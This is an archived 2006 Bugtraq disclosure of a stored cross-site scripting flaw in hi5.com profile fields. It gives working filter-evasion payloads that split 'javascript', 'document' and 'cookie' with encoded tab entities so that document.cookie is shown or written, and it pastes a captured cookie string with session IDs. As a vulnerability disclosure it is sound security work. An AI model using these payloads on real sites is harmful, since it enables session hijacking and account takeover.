lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20060613082029.28254.qmail@securityfocus.com>
Date: 13 Jun 2006 08:20:29 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: hi5.com - XSS with cookie disclosure


hi5.com

Homepage:
http://www.hi5.com

Affected files:

Input boxes of editing your profile.

XSS Vuln with cookie disclosure:

It seems hi5.com allows alot of html tags to be used on thier site but they will filter out words like javascript, applet, and iframe tags (which is to be expected). Heres a link to the page that lists allthe tags they will and won't allow:

http://hi5.com/friend/account/html_tips.html

How do we get around this? Well, to get around the javascript filtering we use An embedded encoded tab to break up the javascript word. Below are a few examples of it. For PoC try putting this in your profile. (I used the Hometown box, all should work tho) :

<IMG SRC="jav&#x09;ascript:alert('XSS');">

or

<DIV STYLE="background-image: url(jav&#x09;ascript:al&#x09;ert('XSS'))">

Why do we have to use an embedded encoded tab in the word "alert" in a div tag and not a img tag? I have no idea! 

Screenshots:
http://www.youfucktard.com/xsp/hi52.jpg
http://www.youfucktard.com/xsp/hi53.jpg

WHERES THE COOKIE?!?!

Now lets change that so we can show our cookie data. Since they don't seem to allow thewords document and cookie, 

lets use the same method above to break it up. Try putting:

Popup alert:
<IMG SRC="jav&#x09;ascript:alert(docu&#x09;ment.coo&#x09;kie);">

Write on screen:
<IMG SRC="jav&#x09;ascript:docu&#x09;ment.write(docu&#x09;ment.cookie);">

Our Cookie:
hi5banner_traffic_US; hi5medium_traffic_US; hi5sky_traffic_US; hi5uniqueAd2=1; hi5adcomRect; hi5adcomSky; hi5inpath=-1;hi5sp=homepage;hi5loggedIn=true;adHistoryLdr=4:1150268890485:4:1150268897936:1:1150269052890:1:1150269092966:8:1150269130139:9:1150269256989:9:1150269310562:10:1150269315812:11:1150269416327:11:1150269438591:12:1150269446349:13:1150269502289:13:1150269518708:14:1150269567146:15:1150269654968; sc=Fics:0:Ficb:0:Ficl:0; JSESSIONID=a229uu7JgBN7; K-JSESSIONID0x9882f778=6821EBA8AA2FB03B1F4D6B04A2799FED;adHistoryRct=1001:1150268898713:1001:1150269130834:1004:1150269316178:1004:1150269447018:1002:1150269519194:1002:1150269669974:1008:1150269721357:1007:1150269799646:1007:1150269971317:1010:1150270159468:1011:1150270778028:1011:1150270823873:1012:1150270950243;adHistorySky=2004:1150269046423:2004:1150269086714:2001:1150269250710:2001:1150269303450:2008:1150269409727:2007:1150269432295:2007:1150269495667:2020:1150269560927:2002:1150269648476:2002:1150269691452:2012:1150269709420:2011:1150269751737:2011:1150269785251:2014:1150270053753:2015:1150270141733



Screenshots:
http://www.youfucktard.com/xsp/hi54.jpg
http://www.youfucktard.com/xsp/hi55.jpg

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ